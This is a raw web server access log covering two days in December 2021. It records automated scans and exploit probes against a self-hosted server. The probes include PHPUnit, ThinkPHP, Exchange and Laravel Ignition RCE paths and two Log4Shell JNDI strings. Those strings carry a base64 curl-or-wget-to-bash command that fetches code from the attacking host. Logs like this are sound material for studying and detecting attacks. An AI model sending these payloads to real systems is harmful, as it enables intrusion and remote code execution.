444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:11:28:09 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:12:21:53 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:12:21:54 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:12:43:49 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:12:55:56 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:12:55:57 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:13:15:40 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:13:15:41 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:13:21:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:13:59:58 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [09/Dec/2021:14:14:09 +0000] 444 - GET https owa.moralanimal.net "/" [Client 124.126.78.188] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [09/Dec/2021:14:34:10 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 69.197.185.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [09/Dec/2021:14:43:32 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:14:58:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Dec/2021:16:34:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.199.108.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:16:55:41 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:17:15:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 109.74.204.66] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [09/Dec/2021:17:35:54 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:18:01:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [09/Dec/2021:18:36:21 +0000] 444 - GET https 64.22.31.253 "//QeeB" [Client 119.90.42.93] [Length 0] [Gzip -] "Go-http-client/2.0" "-" [09/Dec/2021:19:22:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:19:24:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:19:26:51 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:19:39:23 +0000] 400 - GET https localhost "/" [Client 161.35.86.181] [Length 154] [Gzip -] "-" "-" [09/Dec/2021:19:39:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.86.181] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [09/Dec/2021:19:43:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Dec/2021:19:45:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:20:20:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:20:48:35 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:20:48:35 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:21:10:46 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [09/Dec/2021:21:37:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:22:59:44 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [09/Dec/2021:23:17:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [09/Dec/2021:23:17:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [09/Dec/2021:23:17:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [09/Dec/2021:23:48:20 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.96.130.6] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [10/Dec/2021:00:44:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [10/Dec/2021:00:48:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Dec/2021:01:11:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.75] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:01:22:56 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:01:22:56 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:02:29:28 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [10/Dec/2021:02:32:31 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.153] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:02:42:41 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:02:42:41 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:02:43:41 +0000] 444 - GET https autodiscover.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [10/Dec/2021:03:06:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:03:24:04 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:03:24:04 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:04:02:54 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [10/Dec/2021:04:02:54 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [10/Dec/2021:04:26:46 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:04:47:49 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:04:47:50 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:04:53:11 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:04:58:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.83.214.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [10/Dec/2021:04:58:42 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.245] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:04:58:43 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.245] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:04:58:44 +0000] 400 - - https localhost "-" [Client 185.220.100.245] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:04:58:51 +0000] 400 - - https localhost "-" [Client 199.249.230.163] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:05:02:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.32.197.92] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [10/Dec/2021:05:35:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [10/Dec/2021:05:52:38 +0000] 400 - GET http localhost "/7ftK" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:06:25:53 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:07:52:31 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:08:32:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:08:32:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:08:39:19 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:10:01:16 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:10:54:42 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [10/Dec/2021:10:55:00 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:10:55:00 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:11:11:24 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.210.106] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:11:25:47 +0000] 444 - GET https 64.22.31.253 "/cas/login" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [10/Dec/2021:12:06:01 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:12:07:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Dec/2021:12:18:56 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:12:19:24 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:12:20:27 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [10/Dec/2021:12:21:08 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:12:21:08 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:12:32:32 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:12:32:32 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:12:33:24 +0000] 444 - GET https io.moralanimal.net "/" [Client 34.77.162.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [10/Dec/2021:12:46:29 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.96.130.21] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [10/Dec/2021:13:10:37 +0000] 444 - GET https localhost "/" [Client 170.106.115.55] [Length 0] [Gzip -] "curl/7.64.1" "-" [10/Dec/2021:13:10:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 209.141.35.128] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [10/Dec/2021:13:45:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:13:56:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [10/Dec/2021:14:14:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "-" [10/Dec/2021:14:32:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Dec/2021:14:33:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 152.32.135.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Dec/2021:14:34:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 152.32.188.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Dec/2021:15:12:55 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:15:12:56 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Dec/2021:16:20:27 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:16:28:23 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:16:39:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.208.18] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:17:09:08 +0000] 444 - GET https 64.22.31.253 "/t4" [Client 134.209.252.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0" "-" [10/Dec/2021:17:54:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Dec/2021:18:33:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "-" [10/Dec/2021:19:18:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:19:22:46 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:19:23:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Dec/2021:19:35:51 +0000] 400 - - http localhost "-" [Client 91.90.123.71] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:20:00:04 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [10/Dec/2021:20:30:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Dec/2021:20:46:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [10/Dec/2021:20:46:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [10/Dec/2021:21:16:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Dec/2021:21:33:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.166] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [10/Dec/2021:22:02:24 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [11/Dec/2021:00:27:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [11/Dec/2021:00:41:06 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Dec/2021:00:55:59 +0000] 400 - POST http 64.22.31.253 "/" [Client 156.146.50.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "-" [11/Dec/2021:01:51:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Dec/2021:02:03:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [11/Dec/2021:02:36:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.161] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:02:41:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Dec/2021:02:57:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [11/Dec/2021:02:57:21 